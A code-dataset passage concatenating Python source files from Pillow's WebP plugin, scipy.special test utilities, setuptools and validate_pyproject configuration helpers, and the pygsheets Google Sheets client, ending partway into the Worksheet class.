xmp = self._decoder.get_chunk("XMP ")
if icc_profile:
self.info["icc_profile"] = icc_profile
if exif:
self.info["exif"] = exif
if xmp:
self.info["xmp"] = xmp
# Initialize seek state
self._reset(reset=False)
def _getexif(self):
if "exif" not in self.info:
return None
return self.getexif()._get_merged_dict()
def seek(self, frame):
if not self._seek_check(frame):
return
# Set logical frame to requested position
self.__logical_frame = frame
def _reset(self, reset=True):
if reset:
self._decoder.reset()
self.__physical_frame = 0
self.__loaded = -1
self.__timestamp = 0
def _get_next(self):
# Get next frame
ret = self._decoder.get_next()
self.__physical_frame += 1
# Check if an error occurred
if ret is None:
self._reset() # Reset just to be safe
self.seek(0)
raise EOFError("failed to decode next frame in WebP file")
# Compute duration
data, timestamp = ret
duration = timestamp - self.__timestamp
self.__timestamp = timestamp
# libwebp gives frame end, adjust to start of frame
timestamp -= duration
return data, timestamp, duration
def _seek(self, frame):
if self.__physical_frame == frame:
return # Nothing to do
if frame < self.__physical_frame:
self._reset() # Rewind to beginning
while self.__physical_frame < frame:
self._get_next() # Advance to the requested frame
def load(self):
if _webp.HAVE_WEBPANIM:
if self.__loaded != self.__logical_frame:
self._seek(self.__logical_frame)
# We need to load the image data for this frame
data, timestamp, duration = self._get_next()
self.info["timestamp"] = timestamp
self.info["duration"] = duration
self.__loaded = self.__logical_frame
# Set tile
if self.fp and self._exclusive_fp:
self.fp.close()
self.fp = BytesIO(data)
self.tile = [("raw", (0, 0) + self.size, 0, self.rawmode)]
return super().load()
def tell(self):
if not _webp.HAVE_WEBPANIM:
return super().tell()
return self.__logical_frame
def _save_all(im, fp, filename):
encoderinfo = im.encoderinfo.copy()
append_images = list(encoderinfo.get("append_images", []))
# If total frame count is 1, then save using the legacy API, which
# will preserve non-alpha modes
total = 0
for ims in [im] + append_images:
total += getattr(ims, "n_frames", 1)
if total == 1:
_save(im, fp, filename)
return
background = (0, 0, 0, 0)
if "background" in encoderinfo:
background = encoderinfo["background"]
elif "background" in im.info:
background = im.info["background"]
if isinstance(background, int):
# GifImagePlugin stores a global color table index in
# info["background"]. So it must be converted to an RGBA value
palette = im.getpalette()
if palette:
r, g, b = palette[background * 3 : (background + 1) * 3]
background = (r, g, b, 255)
else:
background = (background, background, background, 255)
duration = im.encoderinfo.get("duration", im.info.get("duration", 0))
loop = im.encoderinfo.get("loop", 0)
minimize_size = im.encoderinfo.get("minimize_size", False)
kmin = im.encoderinfo.get("kmin", None)
kmax = im.encoderinfo.get("kmax", None)
allow_mixed = im.encoderinfo.get("allow_mixed", False)
verbose = False
lossless = im.encoderinfo.get("lossless", False)
quality = im.encoderinfo.get("quality", 80)
method = im.encoderinfo.get("method", 0)
icc_profile = im.encoderinfo.get("icc_profile") or ""
exif = im.encoderinfo.get("exif", "")
if isinstance(exif, Image.Exif):
exif = exif.tobytes()
xmp = im.encoderinfo.get("xmp", "")
if allow_mixed:
lossless = False
# Sensible keyframe defaults are from gif2webp.c script
if kmin is None:
kmin = 9 if lossless else 3
if kmax is None:
kmax = 17 if lossless else 5
# Validate background color
if (
not isinstance(background, (list, tuple))
or len(background) != 4
or not all(v >= 0 and v < 256 for v in background)
):
raise OSError(
"Background color is not an RGBA tuple clamped to (0-255): %s"
% str(background)
)
# Convert to packed uint
bg_r, bg_g, bg_b, bg_a = background
background = (bg_a << 24) | (bg_r << 16) | (bg_g << 8) | (bg_b << 0)
# Setup the WebP animation encoder
enc = _webp.WebPAnimEncoder(
im.size[0],
im.size[1],
background,
loop,
minimize_size,
kmin,
kmax,
allow_mixed,
verbose,
)
# Add each frame
frame_idx = 0
timestamp = 0
cur_idx = im.tell()
try:
for ims in [im] + append_images:
# Get # of frames in this image
nfr = getattr(ims, "n_frames", 1)
for idx in range(nfr):
ims.seek(idx)
ims.load()
# Make sure image mode is supported
frame = ims
rawmode = ims.mode
if ims.mode not in _VALID_WEBP_MODES:
alpha = (
"A" in ims.mode
or "a" in ims.mode
or (ims.mode == "P" and "A" in ims.im.getpalettemode())
)
rawmode = "RGBA" if alpha else "RGB"
frame = ims.convert(rawmode)
if rawmode == "RGB":
# For faster conversion, use RGBX
rawmode = "RGBX"
# Append the frame to the animation encoder
enc.add(
frame.tobytes("raw", rawmode),
timestamp,
frame.size[0],
frame.size[1],
rawmode,
lossless,
quality,
method,
)
# Update timestamp and frame index
if isinstance(duration, (list, tuple)):
timestamp += duration[frame_idx]
else:
timestamp += duration
frame_idx += 1
finally:
im.seek(cur_idx)
# Force encoder to flush frames
enc.add(None, timestamp, 0, 0, "", lossless, quality, 0)
# Get the final output from the encoder
data = enc.assemble(icc_profile, exif, xmp)
if data is None:
raise OSError("cannot write file as WebP (encoder returned None)")
fp.write(data)
def _save(im, fp, filename):
lossless = im.encoderinfo.get("lossless", False)
quality = im.encoderinfo.get("quality", 80)
icc_profile = im.encoderinfo.get("icc_profile") or ""
exif = im.encoderinfo.get("exif", "")
if isinstance(exif, Image.Exif):
exif = exif.tobytes()
xmp = im.encoderinfo.get("xmp", "")
method = im.encoderinfo.get("method", 4)
if im.mode not in _VALID_WEBP_LEGACY_MODES:
alpha = (
"A" in im.mode
or "a" in im.mode
or (im.mode == "P" and "transparency" in im.info)
)
im = im.convert("RGBA" if alpha else "RGB")
data = _webp.WebPEncode(
im.tobytes(),
im.size[0],
im.size[1],
lossless,
float(quality),
im.mode,
icc_profile,
method,
exif,
xmp,
)
if data is None:
raise OSError("cannot write file as WebP (encoder returned None)")
fp.write(data)
Image.register_open(WebPImageFile.format, WebPImageFile, _accept)
if SUPPORTED:
Image.register_save(WebPImageFile.format, _save)
if _webp.HAVE_WEBPANIM:
Image.register_save_all(WebPImageFile.format, _save_all)
Image.register_extension(WebPImageFile.format, ".webp")
Image.register_mime(WebPImageFile.format, "image/webp")
```
#### File: scipy/special/_testutils.py
```python
import os
import functools
import operator
from scipy._lib import _pep440
import numpy as np
from numpy.testing import assert_
import pytest
import scipy.special as sc
__all__ = ['with_special_errors', 'assert_func_equal', 'FuncData']
#------------------------------------------------------------------------------
# Check if a module is present to be used in tests
#------------------------------------------------------------------------------
class MissingModule:
def __init__(self, name):
self.name = name
def check_version(module, min_ver):
if type(module) == MissingModule:
return pytest.mark.skip(reason="{} is not installed".format(module.name))
return pytest.mark.skipif(_pep440.parse(module.__version__) < _pep440.Version(min_ver),
reason="{} version >= {} required".format(module.__name__, min_ver))
#------------------------------------------------------------------------------
# Enable convergence and loss of precision warnings -- turn off one by one
#------------------------------------------------------------------------------
def with_special_errors(func):
"""
Enable special function errors (such as underflow, overflow,
loss of precision, etc.)
"""
@functools.wraps(func)
def wrapper(*a, **kw):
with sc.errstate(all='raise'):
res = func(*a, **kw)
return res
return wrapper
#------------------------------------------------------------------------------
# Comparing function values at many data points at once, with helpful
# error reports
#------------------------------------------------------------------------------
def assert_func_equal(func, results, points, rtol=None, atol=None,
param_filter=None, knownfailure=None,
vectorized=True, dtype=None, nan_ok=False,
ignore_inf_sign=False, distinguish_nan_and_inf=True):
if hasattr(points, 'next'):
# it's a generator
points = list(points)
points = np.asarray(points)
if points.ndim == 1:
points = points[:,None]
nparams = points.shape[1]
if hasattr(results, '__name__'):
# function
data = points
result_columns = None
result_func = results
else:
# dataset
data = np.c_[points, results]
result_columns = list(range(nparams, data.shape[1]))
result_func = None
fdata = FuncData(func, data, list(range(nparams)),
result_columns=result_columns, result_func=result_func,
rtol=rtol, atol=atol, param_filter=param_filter,
knownfailure=knownfailure, nan_ok=nan_ok, vectorized=vectorized,
ignore_inf_sign=ignore_inf_sign,
distinguish_nan_and_inf=distinguish_nan_and_inf)
fdata.check()
class FuncData:
"""
Data set for checking a special function.
Parameters
----------
func : function
Function to test
data : numpy array
columnar data to use for testing
param_columns : int or tuple of ints
Columns indices in which the parameters to `func` lie.
Can be imaginary integers to indicate that the parameter
should be cast to complex.
result_columns : int or tuple of ints, optional
Column indices for expected results from `func`.
result_func : callable, optional
Function to call to obtain results.
rtol : float, optional
Required relative tolerance. Default is 5*eps.
atol : float, optional
Required absolute tolerance. Default is 5*tiny.
param_filter : function, or tuple of functions/Nones, optional
Filter functions to exclude some parameter ranges.
If omitted, no filtering is done.
knownfailure : str, optional
Known failure error message to raise when the test is run.
If omitted, no exception is raised.
nan_ok : bool, optional
If nan is always an accepted result.
vectorized : bool, optional
Whether all functions passed in are vectorized.
ignore_inf_sign : bool, optional
Whether to ignore signs of infinities.
(Doesn't matter for complex-valued functions.)
distinguish_nan_and_inf : bool, optional
If True, treat numbers which contain nans or infs as as
equal. Sets ignore_inf_sign to be True.
"""
def __init__(self, func, data, param_columns, result_columns=None,
result_func=None, rtol=None, atol=None, param_filter=None,
knownfailure=None, dataname=None, nan_ok=False, vectorized=True,
ignore_inf_sign=False, distinguish_nan_and_inf=True):
self.func = func
self.data = data
self.dataname = dataname
if not hasattr(param_columns, '__len__'):
param_columns = (param_columns,)
self.param_columns = tuple(param_columns)
if result_columns is not None:
if not hasattr(result_columns, '__len__'):
result_columns = (result_columns,)
self.result_columns = tuple(result_columns)
if result_func is not None:
raise ValueError("Only result_func or result_columns should be provided")
elif result_func is not None:
self.result_columns = None
else:
raise ValueError("Either result_func or result_columns should be provided")
self.result_func = result_func
self.rtol = rtol
self.atol = atol
if not hasattr(param_filter, '__len__'):
param_filter = (param_filter,)
self.param_filter = param_filter
self.knownfailure = knownfailure
self.nan_ok = nan_ok
self.vectorized = vectorized
self.ignore_inf_sign = ignore_inf_sign
self.distinguish_nan_and_inf = distinguish_nan_and_inf
if not self.distinguish_nan_and_inf:
self.ignore_inf_sign = True
def get_tolerances(self, dtype):
if not np.issubdtype(dtype, np.inexact):
dtype = np.dtype(float)
info = np.finfo(dtype)
rtol, atol = self.rtol, self.atol
if rtol is None:
rtol = 5*info.eps
if atol is None:
atol = 5*info.tiny
return rtol, atol
def check(self, data=None, dtype=None, dtypes=None):
"""Check the special function against the data."""
__tracebackhide__ = operator.methodcaller(
'errisinstance', AssertionError
)
if self.knownfailure:
pytest.xfail(reason=self.knownfailure)
if data is None:
data = self.data
if dtype is None:
dtype = data.dtype
else:
data = data.astype(dtype)
rtol, atol = self.get_tolerances(dtype)
# Apply given filter functions
if self.param_filter:
param_mask = np.ones((data.shape[0],), np.bool_)
for j, filter in zip(self.param_columns, self.param_filter):
if filter:
param_mask &= list(filter(data[:,j]))
data = data[param_mask]
# Pick parameters from the correct columns
params = []
for idx, j in enumerate(self.param_columns):
if np.iscomplexobj(j):
j = int(j.imag)
params.append(data[:,j].astype(complex))
elif dtypes and idx < len(dtypes):
params.append(data[:, j].astype(dtypes[idx]))
else:
params.append(data[:,j])
# Helper for evaluating results
def eval_func_at_params(func, skip_mask=None):
if self.vectorized:
got = func(*params)
else:
got = []
for j in range(len(params[0])):
if skip_mask is not None and skip_mask[j]:
got.append(np.nan)
continue
got.append(func(*tuple([params[i][j] for i in range(len(params))])))
got = np.asarray(got)
if not isinstance(got, tuple):
got = (got,)
return got
# Evaluate function to be tested
got = eval_func_at_params(self.func)
# Grab the correct results
if self.result_columns is not None:
# Correct results passed in with the data
wanted = tuple([data[:,icol] for icol in self.result_columns])
else:
# Function producing correct results passed in
skip_mask = None
if self.nan_ok and len(got) == 1:
# Don't spend time evaluating what doesn't need to be evaluated
skip_mask = np.isnan(got[0])
wanted = eval_func_at_params(self.result_func, skip_mask=skip_mask)
# Check the validity of each output returned
assert_(len(got) == len(wanted))
for output_num, (x, y) in enumerate(zip(got, wanted)):
if np.issubdtype(x.dtype, np.complexfloating) or self.ignore_inf_sign:
pinf_x = np.isinf(x)
pinf_y = np.isinf(y)
minf_x = np.isinf(x)
minf_y = np.isinf(y)
else:
pinf_x = np.isposinf(x)
pinf_y = np.isposinf(y)
minf_x = np.isneginf(x)
minf_y = np.isneginf(y)
nan_x = np.isnan(x)
nan_y = np.isnan(y)
with np.errstate(all='ignore'):
abs_y = np.absolute(y)
abs_y[~np.isfinite(abs_y)] = 0
diff = np.absolute(x - y)
diff[~np.isfinite(diff)] = 0
rdiff = diff / np.absolute(y)
rdiff[~np.isfinite(rdiff)] = 0
tol_mask = (diff <= atol + rtol*abs_y)
pinf_mask = (pinf_x == pinf_y)
minf_mask = (minf_x == minf_y)
nan_mask = (nan_x == nan_y)
bad_j = ~(tol_mask & pinf_mask & minf_mask & nan_mask)
point_count = bad_j.size
if self.nan_ok:
bad_j &= ~nan_x
bad_j &= ~nan_y
point_count -= (nan_x | nan_y).sum()
if not self.distinguish_nan_and_inf and not self.nan_ok:
# If nan's are okay we've already covered all these cases
inf_x = np.isinf(x)
inf_y = np.isinf(y)
both_nonfinite = (inf_x & nan_y) | (nan_x & inf_y)
bad_j &= ~both_nonfinite
point_count -= both_nonfinite.sum()
if np.any(bad_j):
# Some bad results: inform what, where, and how bad
msg = [""]
msg.append("Max |adiff|: %g" % diff[bad_j].max())
msg.append("Max |rdiff|: %g" % rdiff[bad_j].max())
msg.append("Bad results (%d out of %d) for the following points (in output %d):"
% (np.sum(bad_j), point_count, output_num,))
for j in np.nonzero(bad_j)[0]:
j = int(j)
fmt = lambda x: "%30s" % np.array2string(x[j], precision=18)
a = " ".join(map(fmt, params))
b = " ".join(map(fmt, got))
c = " ".join(map(fmt, wanted))
d = fmt(rdiff)
msg.append("%s => %s != %s (rdiff %s)" % (a, b, c, d))
assert_(False, "\n".join(msg))
def __repr__(self):
"""Pretty-printing, esp. for Nose output"""
if np.any(list(map(np.iscomplexobj, self.param_columns))):
is_complex = " (complex)"
else:
is_complex = ""
if self.dataname:
return "<Data for %s%s: %s>" % (self.func.__name__, is_complex,
os.path.basename(self.dataname))
else:
return "<Data for %s%s>" % (self.func.__name__, is_complex)
```
#### File: setuptools/config/__init__.py
```python
import warnings
from functools import wraps
from textwrap import dedent
from typing import Callable, TypeVar, cast
from .._deprecation_warning import SetuptoolsDeprecationWarning
from . import setupcfg
Fn = TypeVar("Fn", bound=Callable)
__all__ = ('parse_configuration', 'read_configuration')
def _deprecation_notice(fn: Fn) -> Fn:
@wraps(fn)
def _wrapper(*args, **kwargs):
msg = f"""\
As setuptools moves its configuration towards `pyproject.toml`,
`{__name__}.{fn.__name__}` became deprecated.
For the time being, you can use the `{setupcfg.__name__}` module
to access a backward compatible API, but this module is provisional
and might be removed in the future.
"""
warnings.warn(dedent(msg), SetuptoolsDeprecationWarning)
return fn(*args, **kwargs)
return cast(Fn, _wrapper)
read_configuration = _deprecation_notice(setupcfg.read_configuration)
parse_configuration = _deprecation_notice(setupcfg.parse_configuration)
```
#### File: config/_validate_pyproject/error_reporting.py
```python
import io
import json
import logging
import os
import re
from contextlib import contextmanager
from textwrap import indent, wrap
from typing import Any, Dict, Iterator, List, Optional, Sequence, Union, cast
from .fastjsonschema_exceptions import JsonSchemaValueException
_logger = logging.getLogger(__name__)
_MESSAGE_REPLACEMENTS = {
"must be named by propertyName definition": "keys must be named by",
"one of contains definition": "at least one item that matches",
" same as const definition:": "",
"only specified items": "only items matching the definition",
}
_SKIP_DETAILS = (
"must not be empty",
"is always invalid",
"must not be there",
)
_NEED_DETAILS = {"anyOf", "oneOf", "anyOf", "contains", "propertyNames", "not", "items"}
_CAMEL_CASE_SPLITTER = re.compile(r"\W+|([A-Z][^A-Z\W]*)")
_IDENTIFIER = re.compile(r"^[\w_]+$", re.I)
_TOML_JARGON = {
"object": "table",
"property": "key",
"properties": "keys",
"property names": "keys",
}
class ValidationError(JsonSchemaValueException):
"""Report violations of a given JSON schema.
This class extends :exc:`~fastjsonschema.JsonSchemaValueException`
by adding the following properties:
- ``summary``: an improved version of the ``JsonSchemaValueException`` error message
with only the necessary information)
- ``details``: more contextual information about the error like the failing schema
itself and the value that violates the schema.
Depending on the level of the verbosity of the ``logging`` configuration
the exception message will be only ``summary`` (default) or a combination of
``summary`` and ``details`` (when the logging level is set to :obj:`logging.DEBUG`).
"""
summary = ""
details = ""
_original_message = ""
@classmethod
def _from_jsonschema(cls, ex: JsonSchemaValueException):
formatter = _ErrorFormatting(ex)
obj = cls(str(formatter), ex.value, formatter.name, ex.definition, ex.rule)
debug_code = os.getenv("JSONSCHEMA_DEBUG_CODE_GENERATION", "false").lower()
if debug_code != "false": # pragma: no cover
obj.__cause__, obj.__traceback__ = ex.__cause__, ex.__traceback__
obj._original_message = ex.message
obj.summary = formatter.summary
obj.details = formatter.details
return obj
@contextmanager
def detailed_errors():
try:
yield
except JsonSchemaValueException as ex:
raise ValidationError._from_jsonschema(ex) from None
class _ErrorFormatting:
def __init__(self, ex: JsonSchemaValueException):
self.ex = ex
self.name = f"`{self._simplify_name(ex.name)}`"
self._original_message = self.ex.message.replace(ex.name, self.name)
self._summary = ""
self._details = ""
def __str__(self) -> str:
if _logger.getEffectiveLevel() <= logging.DEBUG and self.details:
return f"{self.summary}\n\n{self.details}"
return self.summary
@property
def summary(self) -> str:
if not self._summary:
self._summary = self._expand_summary()
return self._summary
@property
def details(self) -> str:
if not self._details:
self._details = self._expand_details()
return self._details
def _simplify_name(self, name):
x = len("data.")
return name[x:] if name.startswith("data.") else name
def _expand_summary(self):
msg = self._original_message
for bad, repl in _MESSAGE_REPLACEMENTS.items():
msg = msg.replace(bad, repl)
if any(substring in msg for substring in _SKIP_DETAILS):
return msg
schema = self.ex.rule_definition
if self.ex.rule in _NEED_DETAILS and schema:
summary = _SummaryWriter(_TOML_JARGON)
return f"{msg}:\n\n{indent(summary(schema), ' ')}"
return msg
def _expand_details(self) -> str:
optional = []
desc_lines = self.ex.definition.pop("$$description", [])
desc = self.ex.definition.pop("description", None) or " ".join(desc_lines)
if desc:
description = "\n".join(
wrap(
desc,
width=80,
initial_indent=" ",
subsequent_indent=" ",
break_long_words=False,
)
)
optional.append(f"DESCRIPTION:\n{description}")
schema = json.dumps(self.ex.definition, indent=4)
value = json.dumps(self.ex.value, indent=4)
defaults = [
f"GIVEN VALUE:\n{indent(value, ' ')}",
f"OFFENDING RULE: {self.ex.rule!r}",
f"DEFINITION:\n{indent(schema, ' ')}",
]
return "\n\n".join(optional + defaults)
class _SummaryWriter:
_IGNORE = {"description", "default", "title", "examples"}
def __init__(self, jargon: Optional[Dict[str, str]] = None):
self.jargon: Dict[str, str] = jargon or {}
# Clarify confusing terms
self._terms = {
"anyOf": "at least one of the following",
"oneOf": "exactly one of the following",
"allOf": "all of the following",
"not": "(*NOT* the following)",
"prefixItems": f"{self._jargon('items')} (in order)",
"items": "items",
"contains": "contains at least one of",
"propertyNames": (
f"non-predefined acceptable {self._jargon('property names')}"
),
"patternProperties": f"{self._jargon('properties')} named via pattern",
"const": "predefined value",
"enum": "one of",
}
# Attributes that indicate that the definition is easy and can be done
# inline (e.g. string and number)
self._guess_inline_defs = [
"enum",
"const",
"maxLength",
"minLength",
"pattern",
"format",
"minimum",
"maximum",
"exclusiveMinimum",
"exclusiveMaximum",
"multipleOf",
]
def _jargon(self, term: Union[str, List[str]]) -> Union[str, List[str]]:
if isinstance(term, list):
return [self.jargon.get(t, t) for t in term]
return self.jargon.get(term, term)
def __call__(
self,
schema: Union[dict, List[dict]],
prefix: str = "",
*,
_path: Sequence[str] = (),
) -> str:
if isinstance(schema, list):
return self._handle_list(schema, prefix, _path)
filtered = self._filter_unecessary(schema, _path)
simple = self._handle_simple_dict(filtered, _path)
if simple:
return f"{prefix}{simple}"
child_prefix = self._child_prefix(prefix, " ")
item_prefix = self._child_prefix(prefix, "- ")
indent = len(prefix) * " "
with io.StringIO() as buffer:
for i, (key, value) in enumerate(filtered.items()):
child_path = [*_path, key]
line_prefix = prefix if i == 0 else indent
buffer.write(f"{line_prefix}{self._label(child_path)}:")
# ^ just the first item should receive the complete prefix
if isinstance(value, dict):
filtered = self._filter_unecessary(value, child_path)
simple = self._handle_simple_dict(filtered, child_path)
buffer.write(
f" {simple}"
if simple
else f"\n{self(value, child_prefix, _path=child_path)}"
)
elif isinstance(value, list) and (
key != "type" or self._is_property(child_path)
):
children = self._handle_list(value, item_prefix, child_path)
sep = " " if children.startswith("[") else "\n"
buffer.write(f"{sep}{children}")
else:
buffer.write(f" {self._value(value, child_path)}\n")
return buffer.getvalue()
def _is_unecessary(self, path: Sequence[str]) -> bool:
if self._is_property(path) or not path: # empty path => instruction @ root
return False
key = path[-1]
return any(key.startswith(k) for k in "$_") or key in self._IGNORE
def _filter_unecessary(self, schema: dict, path: Sequence[str]):
return {
key: value
for key, value in schema.items()
if not self._is_unecessary([*path, key])
}
def _handle_simple_dict(self, value: dict, path: Sequence[str]) -> Optional[str]:
inline = any(p in value for p in self._guess_inline_defs)
simple = not any(isinstance(v, (list, dict)) for v in value.values())
if inline or simple:
return f"{{{', '.join(self._inline_attrs(value, path))}}}\n"
return None
def _handle_list(
self, schemas: list, prefix: str = "", path: Sequence[str] = ()
) -> str:
if self._is_unecessary(path):
return ""
repr_ = repr(schemas)
if all(not isinstance(e, (dict, list)) for e in schemas) and len(repr_) < 60:
return f"{repr_}\n"
item_prefix = self._child_prefix(prefix, "- ")
return "".join(
self(v, item_prefix, _path=[*path, f"[{i}]"]) for i, v in enumerate(schemas)
)
def _is_property(self, path: Sequence[str]):
"""Check if the given path can correspond to an arbitrarily named property"""
counter = 0
for key in path[-2::-1]:
if key not in {"properties", "patternProperties"}:
break
counter += 1
# If the counter if even, the path correspond to a JSON Schema keyword
# otherwise it can be any arbitrary string naming a property
return counter % 2 == 1
def _label(self, path: Sequence[str]) -> str:
*parents, key = path
if not self._is_property(path):
norm_key = _separate_terms(key)
return self._terms.get(key) or " ".join(self._jargon(norm_key))
if parents[-1] == "patternProperties":
return f"(regex {key!r})"
return repr(key) # property name
def _value(self, value: Any, path: Sequence[str]) -> str:
if path[-1] == "type" and not self._is_property(path):
type_ = self._jargon(value)
return (
f"[{', '.join(type_)}]" if isinstance(value, list) else cast(str, type_)
)
return repr(value)
def _inline_attrs(self, schema: dict, path: Sequence[str]) -> Iterator[str]:
for key, value in schema.items():
child_path = [*path, key]
yield f"{self._label(child_path)}: {self._value(value, child_path)}"
def _child_prefix(self, parent_prefix: str, child_prefix: str) -> str:
return len(parent_prefix) * " " + child_prefix
def _separate_terms(word: str) -> List[str]:
"""
>>> _separate_terms("FooBar-foo")
['foo', 'bar', 'foo']
"""
return [w.lower() for w in _CAMEL_CASE_SPLITTER.split(word) if w]
``` |
{
"source": "13rilliant/Python-CMS",
"score": 2
} |
#### File: site-packages/pygsheets/client.py
```python
import re
import warnings
import os
import logging
from pygsheets.drive import DriveAPIWrapper
from pygsheets.sheet import SheetAPIWrapper
from pygsheets.spreadsheet import Spreadsheet
from pygsheets.exceptions import SpreadsheetNotFound, NoValidUrlKeyFound
from pygsheets.custom_types import ValueRenderOption, DateTimeRenderOption
from google_auth_httplib2 import AuthorizedHttp
GOOGLE_SHEET_CELL_UPDATES_LIMIT = 50000
_url_key_re_v1 = re.compile(r'key=([^&#]+)')
_url_key_re_v2 = re.compile(r"/spreadsheets/d/([a-zA-Z0-9-_]+)")
_email_patttern = re.compile(r"\"?([-a-zA-Z0-9.`?{}]+@[-a-zA-Z0-9.]+\.\w+)\"?")
# _domain_pattern = re.compile("(?!-)[A-Z\d-]{1,63}(?<!-)$", re.IGNORECASE)
_deprecated_keyword_mapping = {
'parent_id': 'folder',
}
class Client(object):
"""Create or access Google spreadsheets.
Exposes members to create new spreadsheets or open existing ones. Use `authorize` to instantiate an instance of this
class.
>>> import pygsheets
>>> c = pygsheets.authorize()
The sheet API service object is stored in the sheet property and the drive API service object in the drive property.
>>> c.sheet.get('<SPREADSHEET ID>')
>>> c.drive.delete('<FILE ID>')
:param credentials: The credentials object returned by google-auth or google-auth-oauthlib.
:param retries: (Optional) Number of times to retry a connection before raising a TimeOut error.
Default: 3
:param http: The underlying HTTP object to use to make requests. If not specified, a
:class:`httplib2.Http` instance will be constructed.
"""
spreadsheet_cls = Spreadsheet
def __init__(self, credentials, retries=3, http=None):
self.oauth = credentials
self.logger = logging.getLogger(__name__)
http = AuthorizedHttp(credentials, http=http)
data_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "data")
self.sheet = SheetAPIWrapper(http, data_path, retries=retries)
self.drive = DriveAPIWrapper(http, data_path)
@property
def teamDriveId(self):
""" Enable team drive support
Deprecated: use client.drive.enable_team_drive(team_drive_id=?)
"""
return self.drive.team_drive_id
@teamDriveId.setter
def teamDriveId(self, value):
warnings.warn("Depricated please use drive.enable_team_drive")
self.drive.enable_team_drive(value)
def spreadsheet_ids(self, query=None):
"""Get a list of all spreadsheet ids present in the Google Drive or TeamDrive accessed."""
return [x['id'] for x in self.drive.spreadsheet_metadata(query)]
def spreadsheet_titles(self, query=None):
"""Get a list of all spreadsheet titles present in the Google Drive or TeamDrive accessed."""
return [x['name'] for x in self.drive.spreadsheet_metadata(query)]
def create(self, title, template=None, folder=None, **kwargs):
"""Create a new spreadsheet.
The title will always be set to the given value (even overwriting the templates title). The template
can either be a `spreadsheet resource <https://developers.google.com/sheets/api/reference/rest/v4/spreadsheets#resource-spreadsheet>`_
or an instance of :class:`~pygsheets.Spreadsheet`. In both cases undefined values will be ignored.
:param title: Title of the new spreadsheet.
:param template: A template to create the new spreadsheet from.
:param folder: The Id of the folder this sheet will be stored in.
:param kwargs: Standard parameters (see reference for details).
:return: :class:`~pygsheets.Spreadsheet`
"""
result = self.sheet.create(title, template=template, **kwargs)
if folder:
self.drive.move_file(result['spreadsheetId'],
old_folder=self.drive.spreadsheet_metadata(query="name = '" + title + "'")[0]['parents'][0],
new_folder=folder)
return self.spreadsheet_cls(self, jsonsheet=result)
def open(self, title):
"""Open a spreadsheet by title.
In a case where there are several sheets with the same title, the first one found is returned.
>>> import pygsheets
>>> c = pygsheets.authorize()
>>> c.open('TestSheet')
:param title: A title of a spreadsheet.
:returns: :class:`~pygsheets.Spreadsheet`
:raises pygsheets.SpreadsheetNotFound: No spreadsheet with the given title was found.
"""
try:
spreadsheet = list(filter(lambda x: x['name'] == title, self.drive.spreadsheet_metadata()))[0]
return self.open_by_key(spreadsheet['id'])
except (KeyError, IndexError):
raise SpreadsheetNotFound('Could not find a spreadsheet with title %s.' % title)
def open_by_key(self, key):
"""Open a spreadsheet by key.
>>> import pygsheets
>>> c = pygsheets.authorize()
>>> c.open_by_key('<KEY>')
:param key: The key of a spreadsheet. (can be found in the sheet URL)
:returns: :class:`~pygsheets.Spreadsheet`
:raises pygsheets.SpreadsheetNotFound: The given spreadsheet ID was not found.
"""
response = self.sheet.get(key,
fields='properties,sheets/properties,spreadsheetId,namedRanges',
includeGridData=False)
return self.spreadsheet_cls(self, response)
def open_by_url(self, url):
"""Open a spreadsheet by URL.
>>> import pygsheets
>>> c = pygsheets.authorize()
>>> c.open_by_url('https://docs.google.com/spreadsheet/ccc?key=0Bm...FE&hl')
:param url: URL of a spreadsheet as it appears in a browser.
:returns: :class:`~pygsheets.Spreadsheet`
:raises pygsheets.SpreadsheetNotFound: No spreadsheet was found with the given URL.
"""
m1 = _url_key_re_v1.search(url)
if m1:
return self.open_by_key(m1.group(1))
else:
m2 = _url_key_re_v2.search(url)
if m2:
return self.open_by_key(m2.group(1))
else:
raise NoValidUrlKeyFound
def open_all(self, query=''):
"""Opens all available spreadsheets.
Result can be filtered when specifying the query parameter. On the details on how to form the query:
`Reference <https://developers.google.com/drive/v3/web/search-parameters>`_
:param query: (Optional) Can be used to filter the returned metadata.
:returns: A list of :class:`~pygsheets.Spreadsheet`.
"""
return [self.open_by_key(key) for key in self.spreadsheet_ids(query=query)]
def open_as_json(self, key):
"""Return a json representation of the spreadsheet.
See `Reference <https://developers.google.com/sheets/api/reference/rest/v4/spreadsheets#Spreadsheet>`__ for details.
"""
return self.sheet.get(key, fields='properties,sheets/properties,sheets/protectedRanges,'
'spreadsheetId,namedRanges',
includeGridData=False)
def get_range(self, spreadsheet_id,
value_range,
major_dimension='ROWS',
value_render_option=ValueRenderOption.FORMATTED_VALUE,
date_time_render_option=DateTimeRenderOption.SERIAL_NUMBER):
"""Returns a range of values from a spreadsheet. The caller must specify the spreadsheet ID and a range.
Reference: `request <https://developers.google.com/sheets/api/reference/rest/v4/spreadsheets.values/get>`__
:param spreadsheet_id: The ID of the spreadsheet to retrieve data from.
:param value_range: The A1 notation of the values to retrieve.
:param major_dimension: The major dimension that results should use.
For example, if the spreadsheet data is: A1=1,B1=2,A2=3,B2=4, then
requesting range=A1:B2,majorDimension=ROWS will return [[1,2],[3,4]],
whereas requesting range=A1:B2,majorDimension=COLUMNS will return
[[1,3],[2,4]].
:param value_render_option: How values should be represented in the output. The default
render option is `ValueRenderOption.FORMATTED_VALUE`.
:param date_time_render_option: How dates, times, and durations should be represented in the output.
This is ignored if `valueRenderOption` is `FORMATTED_VALUE`. The default
dateTime render option is [`DateTimeRenderOption.SERIAL_NUMBER`].
:return: An array of arrays with the values fetched. Returns an empty array if no
values were fetched. Values are dynamically typed as int, float or string.
"""
result = self.sheet.values_get(spreadsheet_id, value_range, major_dimension, value_render_option,
date_time_render_option)
try:
return result['values']
except KeyError:
return [['']]
```
#### File: site-packages/pygsheets/worksheet.py
```python
import datetime
import re
import warnings
import logging
from pygsheets.cell import Cell
from pygsheets.datarange import DataRange
from pygsheets.exceptions import (CellNotFound, InvalidArgumentValue, RangeNotFound)
from pygsheets.utils import numericise_all, format_addr, fullmatch
from pygsheets.custom_types import *
from pygsheets.chart import Chart
try:
import pandas as pd
except ImportError:
pd = None
_warning_mesage = "this {} is deprecated. Use {} instead"
_deprecated_keyword_mapping = {
'include_empty': 'include_tailing_empty',
'include_all': 'include_tailing_empty_rows',
}
class Worksheet(object):
"""
A worksheet.
:param spreadsheet: Spreadsheet object to which this worksheet belongs to
:param jsonSheet: Contains properties to initialize this worksheet.
Ref to api details for more info
"""
def __init__(self, spreadsheet, jsonSheet):
